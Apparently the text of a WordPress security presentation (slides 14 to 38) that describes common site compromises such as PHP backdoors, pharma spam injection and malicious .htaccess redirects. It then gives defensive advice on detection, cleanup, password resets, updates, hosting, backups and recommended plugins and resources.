  • 14. 1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
  • 15. IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
  • 16. 2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
  • 17. 3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked. https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
  • 18. 4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone Hacked .htaccess file
  • 19. DIY HACK RECOVERY Via SFTP (preferred) or FTP 1 Backup: Download everything. Good to examine later for details of hack if needed. 2 Delete 
 all except: cgi-bin .htaccess wp-config.php (examine these) 3 Upload fresh: WordPress Themes Plugins cleaned uploads
  • 20. Why are people from Thailand and Romania accessing a strangely named PHP file somewhere? Check raw access logs via cPanel db12.php, css.php, dirs35.php???? MONITORING TIPS
  • 21. Audit Activity on Site https://wordpress.org/plugins/wp-simple-firewall/
  • 22. Check WordPress core integrity using Sucuri plugin https:// wordpress.org/plugins/sucuri- scanner/ Run https://wordpress.org/ plugins/gotmls/ to check 
 wp-content folder Look for modified dates, 
 unusual names, file types 
 that don’t belong Compare file list to original download Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php Any file can be hacked! Finding PHP Back Doors Hmmmm? PHP in a CSS folder?
  • 23. Finding and Removing Malicious Redirects Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time. Use http://www.botsvsbrowsers.com/ SimulateUserAgent.asp to verify Scan with Sucuri’s SiteCheck Check all the .htaccess files on the server and remove the redirect. https://sitecheck.sucuri.net/
  • 24. Use Google Search Console! Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site. Links toYour Site – you can find suspicious incoming links here. Internal Links – this report can help reveal rogue sections of your site. http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
  • 25. Check for rogue users and posts Your new admin friends? Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
  • 26. IMMEDIATELY CHANGE PASSWORDS Use Sucuri plugin to Generate New Security Keys Reset all passwords, including WordPress 
 users, FTP, web hosting, control panel Scan computer for viruses!
  • 27. See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination CLEAN UP “BAD” HACK If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure https://www.youtube.com/watch?v=aCbfMkh940Q Or contact sucuri.net for 
 site clean up and monitoring
  • 28. REQUEST SITE REVIEW If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:
 https://support.google.com/webmasters/answer/ 168328?hl=en
  • 30. UPDATE UPDATE UPDATE Timely updates are critical for security. 
 Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP http://askwpgirl.com/updating-wordpress-plugins-themes-core/
  • 31. SECURE YOUR LOGIN Online Generator: 
 http://www.pctools.com/guides/password/ Track Passwords: 
 http://agilebits.com/products/1Password Enable Two-Factor Authentication: http://askwpgirl.com/wordpress-two-factor- authentication-plugins/ Avoid logging in on 
 public WiFi Networks

  • 32. RUN A TIGHT SHIP! Delete ALL unused stuff on server Only use popular and well-maintained themes and plugins Don’t allow users to register (Settings > General) Always hold comments for moderation and use spam filtering (Akismet plugin)
  • 33. GOOD HOSTING Correct File Permissions WordPress Auto Updates Firewall and Scanning Regular Backups Server Security Performance Optimization Managed WordPress Hosts: Site Ground WP Engine Get Flywheel Web Synthesis Pantheon
  • 34. EFFECTIVE SECURITY PLUGIN FEATURES Limit login access Block bad URL requests 
 with a Firewall Audit activity
 Security through obscurity is not security IP addresses don’t matter and should not be used as the foundation of aWordPress security policy My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/ Does all the above and more.Will notify you of vulnerable plugins.
  • 35. BACKUPS Common wisdom is to backup your site Backups are to your site what major medical health care coverage is to your health Usually only helpful in case of a disaster Services: VaultPress and WorpDrive good hosted solutions! Plugins: BackupBuddy (paid), BackWPUp, Duplicator
  • 36. SECURE YOUR COMPUTER Scan for viruses and trojans Be careful about downloading stuff!!!!
  • 37. RESOURCES http://snipe.net/2010/01/when-wordpress-gets-hacked/ https://support.google.com/webmasters/answer/163633?rd=1 *** http://aw-snap.info/articles/find-backdoor.php http://codex.wordpress.org/FAQ_My_site_was_hacked http://sucuri.net - free scan, hack recovering, site monitoring, 
 great posts on how to clean up specific hacks http://aswkpgirl.com/nuke-it-from-orbit https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4- login-protection-feature/ https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress- misinformation-virus/ About the banking hack: https://www.proofpoint.com/es/node/327 Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
  • 38. CONTACT facebook.com/askwpgirl 
 twitter.com/askwpgirl 
 http://askwpgirl.com http://boulderdigitalarts.com One-on-One consulting third Friday of every month at Boulder Digital Arts Six-week theme customization course in Colorado and online. SEO and Best Maintenance Tips Newsletter http://askwpgirl.com